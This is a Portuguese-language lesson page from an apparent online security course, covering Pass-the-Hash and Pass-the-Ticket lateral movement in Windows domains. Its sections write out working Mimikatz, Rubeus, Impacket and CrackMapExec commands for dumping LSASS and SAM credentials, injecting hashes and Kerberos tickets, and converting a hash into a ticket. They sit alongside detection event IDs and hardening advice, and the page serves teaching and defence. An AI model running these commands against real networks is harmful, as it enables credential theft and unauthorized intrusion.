Ataques Pass-the-Hash e Pass-the-Ticket
Use hashes de credenciais e tíquetes Kerberos para se mover lateralmente sem conhecer as senhas em texto simples.
Ataques Pass-the-Hash e Pass-the-Ticket é uma aula grátis de Cyber Security Academy no CoddyKit. Esta é a aula 2 de 4. Você pode ler a aula completa abaixo gratuitamente — depois pratica ao vivo no navegador com um editor de código integrado e um tutor de IA 24/7. Faz parte do caminho de aprendizado de Cyber Security Academy, e seu progresso é sincronizado entre a web e o app CoddyKit. O curso de Cyber Security Academy inclui 4 aulas no total.
Por que esses ataques existem
Os protocolos de credenciais do Windows armazenam segredos de autenticação (hashes NTLM e tíquetes Kerberos) na memória. Um invasor com privilégios de SYSTEM pode extrair esses segredos e reutilizá-los para se autenticar como outros usuários sem saber as senhas.
Extração de hashes NTLM com Mimikatz
O Mimikatz é a principal ferramenta de extração de credenciais no Windows. Quando executado como SYSTEM/Administrador, ele lê a memória do processo LSASS para extrair hashes NTLM e credenciais em texto simples.
# Run mimikatz as Admin:
mimikatz.exe
# Enable debug privilege
privilege::debug
# Dump LSASS credentials
sekurlsa::logonpasswords
# Dump local SAM hashes
lsadump::samUso direto do hash (PtH) com Mimikatz
O PtH injeta um hash NTLM em uma nova sessão sem que seja necessário conhecer a senha em texto simples. O hash autentica o usuário em serviços remotos usando NTLM — uma técnica eficaz para movimentação lateral para outros computadores Windows.
# Pass-the-Hash with Mimikatz:
sekurlsa::pth /user:Administrator /domain:CORP \
/ntlm:aad3b435b51404eeaad3b435b51404ee \
/run:cmd.exe
# Opens cmd.exe authenticated as that userUso direto do hash com Impacket
O Impacket fornece ferramentas Python para PtH: psexec.py, smbexec.py e wmiexec.py aceitam hashes NTLM diretamente para executar comandos remotamente.
# psexec with hash (Linux → Windows)
psexec.py CORP/Administrator@192.168.1.100 \
-hashes aad3b435...:8846f7eaee8fb117...
# wmiexec
wmiexec.py CORP/Admin@192.168.1.100 \
-hashes :8846f7eaee8fb117ad06bdd830b7586cExtração de tíquetes Kerberos
Os tíquetes Kerberos também são armazenados na memória do LSASS. O Mimikatz os extrai; o Rubeus é a ferramenta especializada em operações com tíquetes Kerberos no Windows.
# Mimikatz: export all tickets
sekurlsa::tickets /export
# Rubeus: list tickets
Rubeus.exe triage
# Rubeus: dump specific ticket
Rubeus.exe dump /luid:0x3e7 /service:krbtgtUso direto do tíquete (PtT)
O PtT injeta um tíquete Kerberos roubado na sessão atual. O tíquete autentica o usuário nos serviços como o proprietário original do tíquete — não é necessário ter o hash nem a senha.
# Mimikatz: inject ticket
kerberos::ptt ticket.kirbi
# Rubeus: inject ticket
Rubeus.exe ptt /ticket:ticket.kirbi
# Verify injection
klistDespejo remoto do LSASS
A partir de um ponto de apoio, faça o despejo remoto do LSASS usando o CrackMapExec ou o secretsdump do Impacket — não é necessária uma sessão interativa no destino.
# CrackMapExec
crackmapexec smb 192.168.1.100 -u Admin -p Password123 --sam
crackmapexec smb 192.168.1.100 -u Admin -p Password123 --lsa
# Impacket secretsdump
secretsdump.py CORP/Admin:Password123@192.168.1.100Caminhos de movimentação lateral
Depois de obter hashes ou tíquetes, movimente-se lateralmente: use PtH em outras máquinas com a reutilização de administradores locais, use PtT para acessar serviços do domínio e avance em direção aos privilégios de administrador do domínio visando contas privilegiadas.
Detecção de PtH e PtT
Os defensores detectam PtH por meio de: ID de evento 4624 (logon) com tipo de logon 3 e sem um logon interativo correspondente, anomalias na autenticação NTLM e assinaturas do Mimikatz na memória ou no disco.
# Detection event IDs:
# 4624: Logon (look for type 3 = network)
# 4776: NTLM auth (watch for unexpected hosts)
# 4769: Service ticket request (Kerberos)
# 4648: Explicit credential useMedidas de proteção
Principais medidas: habilite o Credential Guard (que protege o LSASS por meio de virtualização), restrinja a reutilização de administradores locais entre máquinas (LAPS), exija o grupo Protected Users para contas privilegiadas e desative o NTLM sempre que possível.
Conversão de hash em tíquete
A conversão de hash transforma um hash NTLM em um TGT do Kerberos. Isso é útil em ambientes nos quais o NTLM está bloqueado, mas o Kerberos está disponível, ou quando você precisa de um TGT para realizar outros ataques ao Kerberos.
# Mimikatz: overpass-the-hash
sekurlsa::pth /user:Admin /domain:CORP \
/ntlm:8846f7eaee8fb117ad06bdd830b7586c \
/run:powershell.exe
# Then in new session:
Rubeus.exe asktgt /user:Admin /rc4:8846f7ea...Verificação rápida
Qual recurso de segurança do Windows protege o armazenamento de credenciais do LSASS usando virtualização?
Resumo: PtH e PtT
O uso direto do hash e o uso direto do tíquete são a base da movimentação lateral no Active Directory. Ambos exploram o armazenamento em cache de credenciais do Windows no LSASS. O Mimikatz e o Impacket tornam a extração e a reutilização triviais. Defenda-se usando Credential Guard, LAPS, o grupo Protected Users e monitoramento rigoroso dos eventos de autenticação NTLM e Kerberos.
Aprenda Cyber Security Academy com um tutor de IA — grátis
Escreva e execute código real no seu navegador, obtenha ajuda instantânea de um tutor de IA 24/7 e continue de onde parou na web ou no app.
- Cursos
- 76
- Aulas
- 303
Perguntas Frequentes
A aula “Ataques Pass-the-Hash e Pass-the-Ticket” é grátis?
Sim — o texto completo de “Ataques Pass-the-Hash e Pass-the-Ticket” é grátis para ler aqui na web. Para praticá-la interativamente (um editor de código integrado e um tutor de IA 24/7) e desbloquear o restante do curso de Cyber Security Academy, atualize para CoddyKit PRO. O curso de Cyber Security Academy inclui 4 aulas no total.
O que vou aprender em “Ataques Pass-the-Hash e Pass-the-Ticket”?
Use hashes de credenciais e tíquetes Kerberos para se mover lateralmente sem conhecer as senhas em texto simples. Você pratica Cyber Security Academy com código prático que executa diretamente no navegador, e um tutor de IA 24/7 responde suas dúvidas enquanto trabalha na aula.
Preciso ter experiência prévia para começar Cyber Security Academy?
Nenhuma experiência prévia é necessária. Cyber Security Academy no CoddyKit é estruturado para alunos iniciantes até avançados, então você pode começar aqui ou desde o início e aprender no seu ritmo. Esta é a aula 2 de 4.
Quanto tempo leva a aula “Ataques Pass-the-Hash e Pass-the-Ticket”?
A maioria das aulas CoddyKit leva cerca de 5–10 minutos. Cada uma é compacta e interativa, então você faz progresso constante e retoma exatamente de onde parou entre web e app.
Posso escrever e executar código nesta aula de Cyber Security Academy?
Sim. Cada aula de Cyber Security Academy inclui um editor de código integrado, então você escreve e executa código real direto no navegador e recebe feedback de IA instantaneamente — nenhuma configuração local necessária.
Todas as aulas deste curso
- Autenticação do Windows: NTLM e Kerberos
- Ataques Pass-the-Hash e Pass-the-Ticket
- Kerberoasting e AS-REP Roasting
- Fortalecimento do Active Directory